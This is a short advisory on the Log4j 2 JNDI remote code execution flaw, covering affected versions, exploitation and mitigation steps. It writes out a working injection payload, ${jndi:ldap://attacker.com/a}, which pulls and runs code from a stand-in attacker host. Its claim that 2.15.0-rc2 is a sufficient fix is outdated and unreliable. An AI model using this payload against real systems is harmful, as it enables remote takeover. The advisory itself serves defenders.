Why the Log4j2 RCE Bug Is a Global Threat and How to Fix It

Vulnerability Overview

The Apache Log4j 2 library (package org.apache.logging.log4j) contains a remote code execution (RCE) flaw caused by unsafe JNDI lookups. When a log message includes a specially crafted string, Log4j 2 parses it, performs a JNDI lookup, and can load arbitrary classes from an attacker‑controlled LDAP or RMI server. This gives the attacker full control of the host process.

Affected Versions

All Log4j 2 releases from 2.0 up to and including 2.15.0‑rc1 are vulnerable. Versions released after the fix (2.15.0‑rc2 and later) disable the dangerous lookup by default.

Exploitation Mechanism

An attacker injects a payload such as: ${jndi:ldap://attacker.com/a} into any field that is later logged (e.g., HTTP headers, usernames, error messages). Log4j 2 evaluates the expression, contacts the LDAP server, downloads a malicious Java class, and executes its static initializer.

Impact

Log4j 2 is embedded in a large proportion of Java‑based software (web frameworks, application servers, data processing engines, etc.). Consequently, more than 90 % of Java applications are potentially exploitable. The attack requires no user interaction beyond sending the malicious data, making it trivial to weaponize across any industry.

Mitigation Steps

Identify all assets that include Log4j 2. Scan binaries, container images, and dependency manifests for the log4j‑core artifact.

Verify version of each instance. If the version falls in the vulnerable range, proceed to remediation.

Upgrade to a patched release (≥ 2.15.0‑rc2). The official release is available at

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

.

Apply temporary mitigations if immediate upgrade is not possible:

Add the JVM startup option -Dlog4j2.formatMsgNoLookups=true.

Place a file named log4j2.component.properties on the application classpath containing the line log4j2.formatMsgNoLookups=true.

Upgrade the JDK to a version that includes the fix for the JNDI lookup (e.g., JDK 11.0.1, 8u191, 7u201, 6u211 or newer).

Deploy network‑level protections such as Web Application Firewalls (WAF) or Intrusion Prevention Systems (IPS) that block outbound LDAP/RMI traffic from application servers.

Validate the remediation by attempting to log the payload again; the log entry should be recorded verbatim without triggering a lookup.

Additional References

National vulnerability database entry: CNVD‑2021‑95914 . Security vendors have published detailed advisories; consult them for environment‑specific hardening.